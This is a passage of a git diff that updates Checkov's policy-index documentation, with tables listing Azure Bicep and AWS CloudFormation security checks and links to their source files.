+| 63 | CKV_AZURE_54 | resource | Microsoft.DBforMySQL/servers | Ensure MySQL is using the latest version of TLS encryption | Bicep | [MySQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerMinTLSVersion.py) |
+| 64 | CKV_AZURE_56 | resource | Microsoft.Web/sites/config | Ensure that function apps enables Authentication | Bicep | [FunctionAppsEnableAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsEnableAuthentication.py) |
+| 65 | CKV_AZURE_57 | resource | Microsoft.Web/sites | Ensure that CORS disallows every resource to access app services | Bicep | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDisallowCORS.py) |
+| 66 | CKV_AZURE_58 | resource | Microsoft.Synapse/workspaces | Ensure that Azure Synapse workspaces enables managed virtual networks | Bicep | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesManagedVirtualNetworks.py) |
+| 67 | CKV_AZURE_59 | resource | Microsoft.Storage/storageAccounts | Ensure that Storage accounts disallow public access | Bicep | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDisablePublicAccess.py) |
+| 68 | CKV_AZURE_62 | resource | Microsoft.Web/sites | Ensure function apps are not accessible from all regions | Bicep | [FunctionAppDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppDisallowCORS.py) |
+| 69 | CKV_AZURE_63 | resource | Microsoft.Web/sites/config | Ensure that App service enables HTTP logging | Bicep | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttpLoggingEnabled.py) |
+| 70 | CKV_AZURE_64 | resource | Microsoft.StorageSync/storageSyncServices | Ensure that Azure File Sync disables public network access | Bicep | [StorageSyncPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageSyncPublicAccessDisabled.py) |
+| 71 | CKV_AZURE_65 | resource | Microsoft.Web/sites/config | Ensure that App service enables detailed error messages | Bicep | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDetailedErrorMessagesEnabled.py) |
+| 72 | CKV_AZURE_66 | resource | Microsoft.Web/sites/config | Ensure that App service enables failed request tracing | Bicep | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceEnableFailedRequest.py) |
+| 73 | CKV_AZURE_67 | resource | Microsoft.Web/sites | Ensure that 'HTTP Version' is the latest, if used to run the Function app | Bicep | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py) |
+| 74 | CKV_AZURE_67 | resource | Microsoft.Web/sites/slots | Ensure that 'HTTP Version' is the latest, if used to run the Function app | Bicep | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py) |
+| 75 | CKV_AZURE_71 | resource | Microsoft.Web/sites | Ensure that Managed identity provider is enabled for web apps | Bicep | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentityProviderEnabled.py) |
+| 76 | CKV_AZURE_72 | resource | Microsoft.Web/sites | Ensure that remote debugging is not enabled for app services | Bicep | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceRemoteDebuggingNotEnabled.py) |
+| 77 | CKV_AZURE_73 | resource | Microsoft.Automation/automationAccounts/variables | Ensure that Automation account variables are encrypted | Bicep | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AutomationEncrypted.py) |
+| 78 | CKV_AZURE_74 | resource | Microsoft.Kusto/clusters | Ensure that Azure Data Explorer (Kusto) uses disk encryption | Bicep | [DataExplorerUsesDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataExplorerUsesDiskEncryption.py) |
+| 79 | CKV_AZURE_76 | resource | Microsoft.Batch/batchAccounts | Ensure that Azure Batch account uses key vault to encrypt data | Bicep | [AzureBatchAccountUsesKeyVaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureBatchAccountUsesKeyVaultEncryption.py) |
+| 80 | CKV_AZURE_80 | resource | Microsoft.Web/sites/config | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | Bicep | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py) |
+| 81 | CKV_AZURE_82 | resource | Microsoft.Web/sites | Ensure that 'Python version' is the latest, if used to run the web app | Bicep | [AppServicePythonVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePythonVersion.py) |
+| 82 | CKV_AZURE_83 | resource | Microsoft.Web/sites | Ensure that 'Java version' is the latest, if used to run the web app | Bicep | [AppServiceJavaVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceJavaVersion.py) |
+| 83 | CKV_AZURE_84 | resource | Microsoft.Security/pricings | Ensure that Azure Defender is set to On for Storage | Bicep | [AzureDefenderOnStorage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnStorage.py) |
+| 84 | CKV_AZURE_88 | resource | Microsoft.Web/sites/config | Ensure that app services use Azure Files | Bicep | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceUsedAzureFiles.py) |
+| 85 | CKV_AZURE_89 | resource | Microsoft.Cache/redis | Ensure that Azure Cache for Redis disables public network access | Bicep | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/RedisCachePublicNetworkAccessEnabled.py) |
+| 86 | CKV_AZURE_93 | resource | Microsoft.Compute/disks | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | Bicep | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiskEncryptionSet.py) |
+| 87 | CKV_AZURE_94 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that My SQL server enables geo-redundant backups | Bicep | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLGeoBackupEnabled.py) |
+| 88 | CKV_AZURE_95 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets | Bicep | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMScaleSetsAutoOSImagePatchingEnabled.py) |
+| 89 | CKV_AZURE_96 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that MySQL server enables infrastructure encryption | Bicep | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLEncryptionEnabled.py) |
+| 90 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine scale sets have encryption at host enabled | Bicep | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) |
+| 91 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine scale sets have encryption at host enabled | Bicep | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) |
+| 92 | CKV_AZURE_100 | resource | Microsoft.DocumentDb/databaseAccounts | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest | Bicep | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBHaveCMK.py) |
+| 93 | CKV_AZURE_101 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure that Azure Cosmos DB disables public network access | Bicep | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisablesPublicNetwork.py) |
+| 94 | CKV_AZURE_103 | resource | Microsoft.DataFactory/factories | Ensure that Azure Data Factory uses Git repository for source control | Bicep | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryUsesGitRepository.py) |
+| 95 | CKV_AZURE_107 | resource | Microsoft.ApiManagement/service | Ensure that API management services use virtual networks | Bicep | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIServicesUseVirtualNetwork.py) |
+| 96 | CKV_AZURE_109 | resource | Microsoft.KeyVault/vaults | Ensure that key vault allows firewall rules settings | Bicep | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesFirewallRulesSettings.py) |
+| 97 | CKV_AZURE_111 | resource | Microsoft.KeyVault/vaults | Ensure that key vault enables soft delete | Bicep | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesSoftDelete.py) |
+| 98 | CKV_AZURE_112 | resource | Microsoft.KeyVault/vaults/keys | Ensure that key vault key is backed by HSM | Bicep | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyBackedByHSM.py) |
+| 99 | CKV_AZURE_113 | resource | Microsoft.Sql/servers | Ensure that SQL server disables public network access | Bicep | [SQLServerHasPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerHasPublicAccessDisabled.py) |
+| 100 | CKV_AZURE_114 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that key vault secrets have "content_type" set | Bicep | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretContentType.py) |
+| 101 | CKV_AZURE_121 | resource | Microsoft.Network/frontDoors | Ensure that Azure Front Door enables WAF | Bicep | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFrontDoorEnablesWAF.py) |
+| 102 | CKV_AZURE_123 | resource | Microsoft.Network/FrontDoorWebApplicationFirewallPolicies | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes | Bicep | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontdoorUseWAFMode.py) |
+| 103 | CKV_AZURE_130 | resource | Microsoft.DBforPostgreSQL/servers | Ensure that PostgreSQL server enables infrastructure encryption | Bicep | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLEncryptionEnabled.py) |
+| 104 | CKV_AZURE_131 | parameter | string | SecureString parameter should not have hardcoded default values | Bicep | [SecureStringParameterNoHardcodedValue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/param/azure/SecureStringParameterNoHardcodedValue.py) |
+| 105 | CKV_AZURE_132 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes | Bicep | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisableAccessKeyWrite.py) |
+| 106 | CKV_AZURE_134 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services accounts disable public network access | Bicep | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesDisablesPublicNetwork.py) |
+| 107 | CKV_AZURE_145 | resource | Microsoft.Web/sites | Ensure Function app is using the latest version of TLS encryption | Bicep | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py) |
+| 108 | CKV_AZURE_145 | resource | Microsoft.Web/sites/slots | Ensure Function app is using the latest version of TLS encryption | Bicep | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py) |
+| 109 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine does not enable password authentication | Bicep | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) |
+| 110 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine does not enable password authentication | Bicep | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) |
+| 111 | CKV_AZURE_151 | resource | Microsoft.Compute/virtualMachines | Ensure Windows VM enables encryption | Bicep | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMEncryptionAtHost.py) |
+| 112 | CKV_AZURE_158 | resource | Microsoft.Databricks/workspaces | Ensure Databricks Workspace data plane to control plane communication happens over private link | Bicep | [DatabricksWorkspaceIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DatabricksWorkspaceIsNotPublic.py) |
+| 113 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups | Ensure that HTTP (port 80) access is restricted from the internet | Bicep | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) |
+| 114 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that HTTP (port 80) access is restricted from the internet | Bicep | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) |
+| 115 | CKV_AZURE_216 | resource | Microsoft.Network/azureFirewalls | Ensure DenyIntelMode is set to Deny for Azure Firewalls | Bicep | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFirewallDenyThreatIntelMode.py) |
+| 116 | CKV_AZURE_218 | resource | Microsoft.Network/applicationGateways | Ensure Application Gateway defines secure protocols for in transit communication | Bicep | [AppGWDefinesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppGWDefinesSecureProtocols.py) |
+| 117 | CKV_AZURE_236 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services accounts enable local authentication | Bicep | [CognitiveServicesEnableLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesEnableLocalAuth.py) |
+| 118 | CKV_AZURE_238 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services account is not configured with managed identity | Bicep | [CognitiveServicesConfigureIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesConfigureIdentity.py) |
+| 119 | CKV_AZURE_239 | resource | Microsoft.MachineLearningServices/workspaces | Ensure Azure Machine learning workspace is not configured with private endpoint | Bicep | [AzureMLWorkspacePrivateEndpoint.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureMLWorkspacePrivateEndpoint.py) |
+| 120 | CKV2_AZURE_27 | resource | Microsoft.Sql/servers | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL) | Bicep | [SQLServerUsesADAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerUsesADAuth.py) |
+| 121 | CKV2_AZURE_48 | resource | Microsoft.Databricks/workspaces | Ensure that Databricks Workspaces enables customer-managed key for root DBFS encryption | Bicep | [DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py) |
 ---
diff --git a/docs/5.Policy Index/cloudformation.md b/docs/5.Policy Index/cloudformation.md
index 4acc660a0f9..c53dc6276bf 100644
--- a/docs/5.Policy Index/cloudformation.md
+++ b/docs/5.Policy Index/cloudformation.md
@@ -160,25 +160,30 @@ nav_order: 1 | 149 | CKV_AWS_173 | resource | AWS::Lambda::Function | Check encryption settings for Lambda environment variable | Cloudformation | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) | | 150 | CKV_AWS_173 | resource | AWS::Serverless::Function | Check encryption settings for Lambda environment variable | Cloudformation | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) | | 151 | CKV_AWS_174 | resource | AWS::CloudFront::Distribution | Verify CloudFront Distribution Viewer Certificate is using TLS v1.2 | Cloudformation | [CloudFrontTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudFrontTLS12.py) | -| 152 | CKV_AWS_192 | resource | AWS::WAFv2::WebACL | Ensure WAF prevents message lookup in Log4j2. 
See CVE-2021-44228 aka log4jshell | Cloudformation | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WAFACLCVE202144228.py) | -| 153 | CKV_AWS_193 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync has Logging enabled | Cloudformation | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncLogging.py) | -| 154 | CKV_AWS_194 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync has Field-Level logs enabled | Cloudformation | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncFieldLevelLogs.py) | -| 155 | CKV_AWS_195 | resource | AWS::Glue::Crawler | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 156 | CKV_AWS_195 | resource | AWS::Glue::DevEndpoint | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 157 | CKV_AWS_195 | resource | AWS::Glue::Job | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 158 | CKV_AWS_197 | resource | AWS::AmazonMQ::Broker | Ensure MQ Broker Audit logging is enabled | Cloudformation | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MQBrokerAuditLogging.py) | -| 159 | CKV_AWS_258 | resource | AWS::Lambda::Url | Ensure that Lambda function URLs AuthType is 
not None | Cloudformation | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionURLAuth.py) | -| 160 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroup | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | -| 161 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroupIngress | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | -| 162 | CKV_AWS_291 | resource | AWS::MSK::Cluster | Ensure MSK nodes are private | Cloudformation | [MSKClusterNodesArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterNodesArePrivate.py) | -| 163 | CKV_AWS_317 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch Domain Audit Logging is enabled | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | -| 164 | CKV_AWS_317 | resource | AWS::OpenSearchService::Domain | Ensure Elasticsearch Domain Audit Logging is enabled | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | -| 165 | CKV_AWS_360 | resource | AWS::DocDB::DBCluster | Ensure DocumentDB has an adequate backup retention period | Cloudformation | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBBackupRetention.py) | -| 166 | CKV_AWS_361 | 
resource | AWS::Neptune::DBCluster | Ensure that Neptune DB cluster has automated backups enabled with adequate retention | Cloudformation | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterBackupRetention.py) | -| 167 | CKV_AWS_363 | resource | AWS::Lambda::Function | Ensure Lambda Runtime is not deprecated | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py) | -| 168 | CKV_AWS_363 | resource | AWS::Serverless::Function | Ensure Lambda Runtime is not deprecated | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py) | -| 169 | CKV_AWS_364 | resource | AWS::Lambda::Permission | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount | Cloudformation | [LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaServicePermission.py) | -| 170 | CKV2_AWS_33 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync is protected by WAF | Cloudformation | [AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/AppSyncProtectedByWAF.yaml) | +| 152 | CKV_AWS_187 | resource | AWS::SageMaker::Domain | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK) | Cloudformation | [SagemakerNotebookEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerNotebookEncryptedWithCMK.py) | +| 153 | CKV_AWS_187 | resource | AWS::SageMaker::NotebookInstance | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK) | Cloudformation | 
[SagemakerNotebookEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerNotebookEncryptedWithCMK.py) | +| 154 | CKV_AWS_192 | resource | AWS::WAFv2::WebACL | Ensure WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Cloudformation | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WAFACLCVE202144228.py) | +| 155 | CKV_AWS_193 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync has Logging enabled | Cloudformation | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncLogging.py) | +| 156 | CKV_AWS_194 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync has Field-Level logs enabled | Cloudformation | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncFieldLevelLogs.py) | +| 157 | CKV_AWS_195 | resource | AWS::Glue::Crawler | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 158 | CKV_AWS_195 | resource | AWS::Glue::DevEndpoint | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 159 | CKV_AWS_195 | resource | AWS::Glue::Job | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 160 | CKV_AWS_197 | resource | AWS::AmazonMQ::Broker | Ensure MQ Broker Audit logging is 
enabled | Cloudformation | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MQBrokerAuditLogging.py) | +| 161 | CKV_AWS_258 | resource | AWS::Lambda::Url | Ensure that Lambda function URLs AuthType is not None | Cloudformation | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionURLAuth.py) | +| 162 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroup | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | +| 163 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroupIngress | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | +| 164 | CKV_AWS_291 | resource | AWS::MSK::Cluster | Ensure MSK nodes are private | Cloudformation | [MSKClusterNodesArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterNodesArePrivate.py) | +| 165 | CKV_AWS_317 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch Domain Audit Logging is enabled | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | +| 166 | CKV_AWS_317 | resource | AWS::OpenSearchService::Domain | Ensure Elasticsearch Domain Audit Logging is enabled | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | +| 167 | CKV_AWS_360 | resource | 
AWS::DocDB::DBCluster | Ensure DocumentDB has an adequate backup retention period | Cloudformation | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBBackupRetention.py) | +| 168 | CKV_AWS_361 | resource | AWS::Neptune::DBCluster | Ensure that Neptune DB cluster has automated backups enabled with adequate retention | Cloudformation | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterBackupRetention.py) | +| 169 | CKV_AWS_363 | resource | AWS::Lambda::Function | Ensure Lambda Runtime is not deprecated | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py) | +| 170 | CKV_AWS_363 | resource | AWS::Serverless::Function | Ensure Lambda Runtime is not deprecated | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py) | +| 171 | CKV_AWS_364 | resource | AWS::Lambda::Permission | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount | Cloudformation | [LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaServicePermission.py) | +| 172 | CKV_AWS_366 | resource | AWS::Cognito::IdentityPool | Ensure AWS Cognito identity pool does not allow unauthenticated guest access | Cloudformation | [CognitoUnauthenticatedIdentities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CognitoUnauthenticatedIdentities.py) | +| 173 | CKV2_AWS_33 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync is protected by WAF | Cloudformation | 
